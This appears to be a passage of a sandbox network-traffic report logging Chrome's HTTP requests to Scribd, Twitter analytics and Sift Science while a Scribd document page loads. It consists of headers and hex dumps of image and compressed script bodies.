                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3100
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "UWd2Czd/2naEZg+J6Ff6yD/8VHUgZn1Zg+tJDGYFUyo"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=7457 idim=149x198 ifmt=png ofsz=3100 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010216
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 59
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 623982
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100092-CHI, cache-ewr-kewr1740056-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 69, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522378.383212,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 52 49 46 46 14 0c 00 00 57 45 42 50 56 50 38 20 08 0c 00 00 70 39 00 9d 01 2a 95 00 c6 00 3e 6d 30 94 48 24 22 a1 a1 24 f2 6c d8 80 0d 89 69 6e dd 5f 60 29 9f a3 ff d7 7b 4e fe e9 e1 6f 90 cf 74 7b 45 eb 41 8c fe b2 b5 11 f9 4f de 0f ce 7f 72 fd c5 f5 e3 bc 1f 7f 7f e4 fa 81 7e 2f fc 9b fd 2e f5 4e 9d e6 05 ec 1f d4 7f e6 f8 65 7f 77 e8 2f 88 07 f3 8f eb 3f f2 7d 4d ff 5d e0 7d f7 cf f6 de c0 1f c9 3f bc 7f cf fb 8c fa 5f fe d3 ff 87 fa df 3b 9f a1 ff ab ff c9 ee 0d fc df fb 77 fc de c1 fe 87 ff b2 c6 31 00 b0 11 21 3d 88 10 87 52 a1 fd 2b e4 63 0d f3 8a de 2c 7d 56 a1 ed ec f9 57 5c d6 43 71 38 7a 5f 08 3f 03 a8 57 0f 6c b1 38 4e a5 2a 1e 70 46 44 8a a0 d8 19 00 dd 29 67 92 44 4a 5e 4c 6e cd e9 b3 9e 2c 7e 06 4f 9b 67 3c b3 81 d5 f2 9d e8 88 35 0c 72 b1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 p9*>m0H$"$lin_`){Not{EAOr~/.New/?}M]}?_;w1!=R+c,}VW\Cq8z_?Wl8N*pFD)gDJ^Ln,~Og<5r
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 71 a5 bb 70 0c 74 35 6b a7 93 75 42 77 43 0d 77 8d ee ad d2 0f 5e 0e 2a 37 c4 c7 68 e1 4b a6 53 7a 1c 18 67 13 3a ac 5f ca 77 1d 7e 94 2d 1e fb 9a f8 5a a9 db f9 b0 1b 87 7c 5e 6b f5 31 70 21 84 97 9a a9 0c fe bc bc 8a 25 02 6a 5c 14 95 6e 2c b1 7f 06 df 67 5f 5c a0 d4 4a 06 e9 38 d2 2d e0 ff 65 09 d0 8f b1 55 66 ff d9 df 39 60 ba d0 95 c8 2e 32 33 d3 b4 52 c1 e5 08 b9 f6 fb a5 f1 26 59 9a 23 d1 89 81 73 67 51 d9 77 d4 1a 91 70 2b 3c eb f8 ea 8b 06 f2 3b 81 8f fd 65 14 3c 36 e0 0c e5 93 a0 e9 ef e6 c1 40 94 86 75 ab 98 d0 fb 83 f2 b6 0c 77 8e 6e b9 a3 e4 75 5b 7a dc 52 fb 87 b6 eb 54 e7 c6 fd ca 55 a9 f1 c7 f9 1c c8 4e 3c cd f7 8a 43 f0 13 f1 cd 6b a9 70 23 5b 62 53 1e 96 49 3c 32 b4 44 ed 6a 45 32 6a 85 6c f6 a2 7f 7c a4 24 ea 51 4e f7 34 1b ef 5d 60 b5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: qpt5kuBwCw^*7hKSzg:_w~-Z|^k1p!%j\n,g_\J8-eUf9`.23R&Y#sgQwp+<;e<6@uwnu[zRTUN<Ckp#[bSI<2DjE2jl|$QN4]`
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC344INData Raw: 60 92 71 29 ca a0 47 0e 76 63 27 cc 7b 2e 78 ca 4c e2 77 24 a1 30 fe e4 ca 7b 35 6e 9e 6c b2 39 9e bc fb 6e 00 02 38 37 25 f8 2d 78 0f 82 4c f2 50 53 6c 9c 70 98 54 b1 53 b0 03 0b 07 1a 7a 48 70 ff a7 c7 01 39 9b 2e f9 d4 f5 b6 40 75 af 7e 88 14 4f 5a e0 3d 6c 12 e1 59 20 ee f8 ab 12 ca 71 83 a5 b6 98 d5 a4 40 9d c9 4d 6b 86 9e 63 4b 0d 4d a9 20 d5 32 a7 4e 1e b3 72 0e 99 09 99 97 af 15 ae 20 38 93 64 37 02 32 ea 35 ab 37 a7 8b 90 33 a3 b1 d9 ae 02 dc 47 33 45 3c 8b a6 a1 b4 46 a0 2a 4a e0 69 93 24 ea e3 d7 25 38 2e 31 c3 ab 13 cb b4 d7 23 81 a3 d6 66 82 59 e1 32 b1 9f cd d4 75 8f 2d f3 60 65 4a 73 25 c6 c3 b4 3d 15 d3 dd b1 5d 58 8c aa 94 24 d8 88 a3 33 3b b8 b2 9f f4 d4 8c 17 75 a1 2e 96 73 38 73 77 25 4f 5d 41 2c 03 24 47 55 26 10 77 a1 15 7c e7 58 07
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: `q)Gvc'{.xLw$0{5nl9n87%-xLPSlpTSzHp9.@u~OZ=lY q@MkcKM 2Nr 8d72573G3E<F*Ji$%8.1#fY2u-`eJs%=]X$3;u.s8sw%O]A,$GU&w|X


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        94192.168.2.1649835104.244.42.1314436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1105OUTGET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: analytics.twitter.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC572INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        date: Fri, 06 Dec 2024 21:59:37 GMT
                                                                                                                                                                                                                                                                                                                                                                                        perf: 7402827104
                                                                                                                                                                                                                                                                                                                                                                                        server: tsa_b
                                                                                                                                                                                                                                                                                                                                                                                        set-cookie: personalization_id="v1_GaFna+OYzedzGqXlkIr+8A=="; Max-Age=63072000; Expires=Sun, 06 Dec 2026 21:59:38 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        content-type: image/gif;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                                        content-length: 43
                                                                                                                                                                                                                                                                                                                                                                                        x-transaction-id: 950b19d8e64603fb
                                                                                                                                                                                                                                                                                                                                                                                        strict-transport-security: max-age=631138519
                                                                                                                                                                                                                                                                                                                                                                                        x-response-time: 80
                                                                                                                                                                                                                                                                                                                                                                                        x-connection-hash: a5d0a2f69dd93a783555223274d8202dcdc5da35c341e9864b7b3b76b539d7ed
                                                                                                                                                                                                                                                                                                                                                                                        connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff 00 00 00 21 f9 04 09 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        95192.168.2.164983934.96.67.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC521OUTGET /s.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: cdn.siftscience.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC939INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1731608263721686
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 26602
                                                                                                                                                                                                                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=37M6eg==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=fXV9U0Dla7eh7Xytfy5wmw==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 26602
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4cPbRADO3dVT8q4vjvkbvybxk2mX_aQzpmhsJkzDKut6hs-3oVCJkXu5ntKK7yi-vl6yznT6AyoA
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 18:32:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Sat, 07 Dec 2024 18:32:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=86400, no-transform
                                                                                                                                                                                                                                                                                                                                                                                        Age: 12414
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Thu, 14 Nov 2024 18:17:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "7d757d5340e56bb7a1ed7cad7f2e709b"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC451INData Raw: 1f 8b 08 08 b4 34 36 67 02 ff 73 2e 6a 73 5f 2e 67 73 74 6d 70 00 cc bd 69 63 db 48 92 20 fa 7d 7e 05 85 ad 96 01 13 84 08 92 ba 00 41 1c 59 b2 ab 3c 63 d9 1e db 55 d5 b3 34 cb 03 91 20 05 0b 04 58 38 74 58 e4 fe f6 17 11 79 20 01 82 b2 ab 67 fa ed 76 bb 44 20 8f c8 44 1e 71 65 44 e4 de f3 e7 ff d2 7a de 7a 1d 4f a2 62 1a 64 ad 49 32 0d 5a b3 34 59 38 98 7c 9e 3e 2c f3 a4 f3 35 c3 97 eb 3c 5f 66 ce de de 3c cc af 8b 2b 6b 92 2c f6 ae d2 f0 7e 6f a2 16 7a 13 4e 82 38 0b a6 ad 22 9e 06 69 2b bf 0e 5a 97 af 3f b5 74 ac 0c 75 ef ee ee ac 64 09 25 92 22 9d 04 56 92 ce f7 22 56 23 db 5b 84 79 87 bf 58 cb eb a5 d1 12 2f 4f 74 f0 7d 54 cc c3 f8 22 c8 83 49 de ba ed 5a c7 96 8d c9 d8 cc 32 8c 23 7f fa 60 c5 41 be a7 16 13 0d ee 61 c1 51 eb 3f 8a 70 72 f3 29 5c 04
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 46gs.js_.gstmpicH }~AY<cU4 X8tXy gvD DqeDzzObdI2Z4Y8|>,5<_f<+k,~ozN8"i+Z?tud%"V"V#[yX/Ot}T"IZ2#`AaQ?pr)\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 89 a3 87 4e 91 85 f1 5c 69 91 2a f5 7a f6 ff e2 bf df e9 41 6d 45 fe e6 c3 0c ed cd 00 64 90 2e d3 30 ce bf 66 3d 5a c9 c9 f2 21 a5 79 d3 27 46 ab d7 b5 8f 86 ad 7f 4b 62 3f 6b fd e2 fb f3 96 fe 15 9f ff 35 4a 96 d7 45 86 cb d2 68 ac b4 3f 6c 41 03 41 9c 87 31 3c 64 61 f4 10 dc b6 f4 5b 9e 64 dd f2 a4 7f 4d 8a 3c 4a 92 1b ec 91 f1 7f 61 57 34 8c 4b 65 44 6a 6f 79 1a 04 7b b7 fd 7f 62 47 f7 fe e5 5f 76 66 45 4c cb 5c 37 1e b5 22 0b 5a 59 9e 86 93 5c 73 6f fd b4 15 78 1a 36 08 dd 0a a6 da 8e 97 c3 ce 48 66 ad 79 94 5c f9 d1 a7 eb 30 1b 96 8f 4e 53 c9 3b da 33 43 f6 e3 6c 87 c5 e1 34 96 c8 82 68 36 c4 3f ce e3 da 15 9d 6d c5 7a 60 3c a6 41 5e a4 71 2b d8 dd 0d ac 2f 5f 82 ec 32 99 16 11 bc bd bb fa 0a 5b d7 5a a6 49 9e 20 14 0b 76 f6 bb bb f8 7d 0a 63 94 e6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: N\i*zAmEd.0f=Z!y'FKb?k5JEh?lAA1<da[dM<JaW4KeDjoy{bG_vfEL\7"ZY\sox6Hfy\0NS;3Cl4h6?mz`<A^q+/_2[ZI v}c
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 32 0b 05 a3 a7 41 16 54 c8 16 6d e7 2f d8 11 af 1c 1f 86 d2 bf c4 17 90 cc b0 7a 77 6d 7e 01 3a 58 27 fe 1a fb f4 92 99 02 c2 af 07 de 9c f7 1a 7a 66 96 0d 58 0c a9 23 47 50 87 df 56 16 1c b4 04 84 6a 12 64 d9 06 fa cf 05 a6 27 78 b0 28 43 be 60 13 78 92 0b d6 67 65 ae 70 0c 3e 86 df 02 60 65 92 3d 7d f0 dc 37 80 93 d1 81 6a 0d 39 26 cc 0c 07 b8 14 ff 5e d7 bb ab cc e8 30 c8 8b 30 66 a3 48 55 bb 86 f1 dc 07 4c 84 dc 4c 0c 30 0a 33 31 90 a2 14 e5 1a 9d c2 9a 9c 9e 14 ee b4 ed f9 06 ef 5d f2 9e 7d 01 cd 83 9e 9a 53 c3 cd bd d4 ca 96 0c 63 9a 05 e2 11 d1 e1 8e 37 59 37 2d d1 c9 3f 86 a6 d9 64 aa c3 8e 45 75 c2 d2 d5 af 73 ba 6b c3 cd ac 5f fc ec 1a 58 a4 a5 5c 24 93 d9 dc 91 4b c6 a8 71 3a 01 5f 33 50 c8 13 0f a2 ac 98 59 5a 65 c0 22 9b 1b cb 6d c9 f2 94 8e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 2ATm/zwm~:X'zfX#GPVjd'x(C`xgep>`e=}7j9&^00fHULL031]}Sc7Y7-?dEusk_X\$Kq:_3PYZe"m
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: ae 9e 9d 9c 24 2b d4 a0 f5 7b 9d c4 68 c7 6b 09 68 f2 04 a0 70 95 ef fe 9f 1f 05 34 dd 0e e8 8f fc 8f 1f 85 32 db 0a 25 ff 43 8f 57 d0 9b a7 01 c5 9c cf ad 88 1d 20 70 c2 52 41 81 a1 9a 29 25 08 28 20 d8 fb 14 01 30 ae 39 f3 62 5d 72 f6 28 fe 6e aa 87 0b 71 c6 e0 67 b0 12 d5 73 30 55 0f 03 9b d2 86 ed 28 55 e0 7c 9d 02 07 1c 12 03 2c 0a a6 a8 e9 8e cb 72 a3 7c 6c fc d0 61 5f 6c a6 a8 df 0e 46 e9 18 35 4b e3 72 3d 81 40 b8 45 e5 df b0 96 54 41 49 c7 c3 84 dc 83 76 16 61 16 18 86 ae cb 4f 83 99 51 4e 50 7c a1 eb 29 f4 d0 8a 41 be 40 c5 45 a9 c6 49 74 d4 47 ca d2 99 5a 9a 54 3c 4f 16 2f a4 00 e5 06 d6 14 36 c2 30 05 09 e7 16 8f ac 0c 47 47 05 17 3d 9b 78 46 90 e5 7e 3c 41 35 0a 6a d0 51 80 c9 95 3e 03 18 92 f0 0c c3 80 66 83 58 f7 4d 18 83 42 d7 43 2f 94 67
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $+{hkhp42%CW pRA)%( 09b]r(nqgs0U(U|,r|la_lF5Kr=@ETAIvaOQNP|)A@EItGZT<O/60GG=xF~<A5jQ>fXMBC/g
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 68 57 69 f9 b2 7a 32 a7 25 24 0d 54 da d6 16 41 96 f9 f3 40 43 0b 2a 98 e1 47 fe 0e 3d 29 e1 bc ab d0 49 21 88 dc 04 0f 28 ab 59 b3 30 02 fe bf 89 b4 ef 6c 3d da 31 43 69 79 40 32 6e bb 9d 1b c0 0a 05 20 cf c2 82 8b 39 cb bc d3 e5 e8 08 d8 59 e4 50 90 12 01 21 5d 02 7f dd c4 ce 54 5b 63 2d 6d 65 81 d8 a7 94 e4 d4 05 de c5 ba 0a e3 a9 4e 96 7a b1 51 21 6b a2 eb 01 5a 49 b0 33 b6 0d 59 1d 4f dc d0 c8 4c 91 ce 63 86 5f 55 da df 21 ab d7 1d 5c 6c 42 30 50 a5 50 f1 31 8f 01 ca 39 0e cc 20 9d e1 4c 0b 10 76 20 df 49 91 20 0b ed 1b f2 8a 00 6c 73 e0 4b 56 4d 9a a4 06 6b 34 0f 79 aa 45 c6 6e 26 f5 b6 9a ca 6e e1 2c e5 51 66 65 58 93 c6 91 54 ec 4d 36 46 92 9b 9f a8 23 19 8e f9 47 a7 6d 65 2c 63 1a cb 5c 19 cb 40 97 23 97 57 47 2e 59 1b 2e e4 b2 af 24 94 ac 66 71
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hWiz2%$TA@C*G=)I!(Y0l=1Ciy@2n 9YP!]T[c-meNzQ!kZI3YOLc_U!\lB0PP19 Lv I lsKVMk4yEn&n,QfeXTM6F#Gme,c\@#WG.Y.$fq
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: b2 b0 61 38 ca 87 cf 51 a7 a9 e8 8a e9 7c 0b f8 66 a3 3a 41 c5 6a a5 c3 0c c0 e8 a3 96 7d 8a a7 4f 25 6f 39 f2 cd 64 bc 46 66 d5 67 66 63 19 33 1b 43 b3 be ad ac 6a b3 45 78 57 f8 12 94 ac 59 6e c4 6d 8f 86 9e ec 07 f1 d0 51 62 31 60 74 d1 53 ec 1c 50 6b 1c 44 68 46 00 cb 10 4d e9 7d 52 80 0e 60 b9 19 1b ba 5d f4 14 13 f3 8a 54 86 50 e1 6a a5 0c 91 4c 15 5b bc ef 32 05 79 50 61 a8 8b 26 86 1a 4d 55 8b 35 b0 98 d9 f9 b2 68 f0 d8 29 91 77 92 4d 96 05 7a c3 44 49 7a 11 2c f3 eb 86 d2 dc 5f 8f d1 36 ab 2c ba 36 59 12 31 06 05 c9 11 1b b8 91 95 50 a9 79 39 fa ef f5 0b 72 de 02 ba 09 6b 17 c4 21 c8 b4 ee c2 29 59 90 c2 e3 75 80 0e be 46 a9 91 b3 00 dd 00 fb 0c bb ea 36 40 eb 6f 60 a4 d7 26 50 ab e9 1d 50 2c 40 ad 93 22 4d 11 7b 35 7c 03 b6 55 7e 75 43 1d 83 cb
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: a8Q|f:Aj}O%o9dFfgfc3CjExWYnmQb1`tSPkDhFM}R`]TPjL[2yPa&MU5h)wMzDIz,_6,6Y1Py9rk!)YuF6@o`&PP,@"M{5|U~uC
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 3d e8 99 77 ad 67 66 64 98 7d 1b 85 d7 5b 3d 81 c4 c4 bb d3 d1 61 0d b3 26 c0 76 f7 0e 41 48 65 d9 d7 90 01 2b 66 9f 9d bf da fd e3 6e af 7b 74 d4 45 23 fb 02 6a 16 50 a7 80 3a 66 bf 8f 72 ed ad ee 43 a2 0f e0 7c 93 65 45 06 6f 8a 65 5f 43 46 09 ee 78 30 e8 f7 ed 01 7a 3f 08 79 bf be 4e 43 7e 48 62 ef 3b 05 80 2d cc 2b 1d cf 81 37 86 7a 6c 0e 8e 40 0e 60 65 07 4f 95 ed 63 d9 ae 2c db 7f aa 6c 0f ca f6 7b b2 6c ef a9 b2 36 94 ed 0d 64 59 fb a9 b2 5d 28 8b ee f2 bc 6c f7 89 b2 c7 50 54 7e d9 b1 43 a3 4a 85 37 8b 1e 19 30 ac 13 1c 68 39 fe 38 45 34 37 91 00 71 e4 64 90 9d 35 b6 75 08 6d ed cb 6e 1d 3e 51 f2 a0 32 e0 07 4f 94 dc af 0c f7 fe 13 25 07 95 c1 1e 3c 51 b2 5f 19 ea fe 13 25 7b 95 81 ee 3d 51 d2 56 c7 d9 76 68 33 50 e1 8d a2 38 ca 11 ee 0e b9 69 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =wgfd}[=a&vAHe+fn{tE#jP:frC|eEoe_CFx0z?yNC~Hb;-+7zl@`eOc,l{l6dY](lPT~CJ70h98E47qd5umn>Q2O%<Q_%{=QVvh3P8ip
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: c6 d9 13 6d c1 bb 9f 42 59 3a 7e dd 0b 95 e8 80 5b 3b 2f 4a 98 72 5a 9a e2 e5 94 ca da 35 14 24 f7 16 47 8d 87 59 9a 2a cf ef 2d 68 9d e9 04 4b e8 fc 33 71 22 c4 e2 da 5e 1f 7a f9 64 fd b7 c5 62 7b 65 18 98 ef 35 be b5 7e 65 dd ef 7d 9e 4a d5 26 56 c4 0d b0 bd 59 c8 78 a2 59 58 a2 d0 e8 87 00 26 73 6f f4 79 3a 86 ff 3e 5b 9f bf 98 9f 3b e3 e7 7b 26 e9 f0 94 7c 9e 03 bb 89 d5 6b 5a 4a 1e ef 2d 64 43 13 43 3d af ec db dc 20 46 1e 00 be bc 5f c2 9b 43 c7 f4 bc 09 c3 42 57 49 a8 45 4a 46 41 86 c3 61 08 24 95 92 d6 44 f5 01 25 43 85 ac d2 38 2a 4d 24 47 0d 12 aa b0 8a a7 a3 21 b5 43 b2 37 f8 9a 1b a4 e2 55 77 3e 9a 5e 84 96 d2 8c 21 43 d7 29 89 f4 bd a4 1e 4c 01 d1 30 55 67 60 a9 c3 65 50 80 a4 e6 1c df eb ba fe 89 94 3b 84 63 a2 99 08 b7 2c d7 47 d1 0f 7a 96
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: mBY:~[;/JrZ5$GY*-hK3q"^zdb{e5~e}J&VYxYX&soy:>[;{&|kZJ-dCC= F_CBWIEJFAa$D%C8*M$G!C7Uw>^!C)L0Ug`eP;c,Gz
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1390INData Raw: 78 c0 2a 6b 23 05 ab 31 02 08 72 e7 45 48 83 ed a7 0f 9a 64 4f 52 5c 6e 97 ec 26 28 eb dd f9 df a9 1d 7e a7 14 5d 31 65 55 5f 21 ff 6c 8e 44 26 4d 22 4b 3e a1 08 c1 1c 60 c5 5a 41 42 47 58 0f 37 1f ae 0b 03 fd 4b 88 9c 93 4f 2c 2e fd fa 5c 60 2c 95 2d 23 6b b0 95 88 2d a4 aa 6b 2d 6d 20 de 4a 8a ad 18 4f cd a4 cd 97 60 ee f9 d2 bf e9 32 99 32 d4 54 4d f2 34 4d 99 cb 04 a8 d7 eb 97 5e bd c3 a6 4c c7 1f fc 40 c6 1b 55 41 c1 97 ef 3d ff d7 c9 e4 4b 12 ef fc eb f3 3d be e0 6a cd e5 95 d6 80 7a 00 58 d2 58 31 d8 48 45 78 aa be a5 95 dd dd 6a c2 a9 77 38 ac a6 38 5d 24 f4 20 de 0d 1d eb f9 70 f4 87 df f9 76 d6 f9 df 63 63 38 84 94 cb 8f f0 05 e9 2d 60 81 cf 8e 01 7f f5 cf d3 f6 67 6b f8 79 fa dc 10 fe 4d c0 ac 2a de ec 42 0e b4 51 e4 75 0e 51 9d c1 f6 f5 db 24
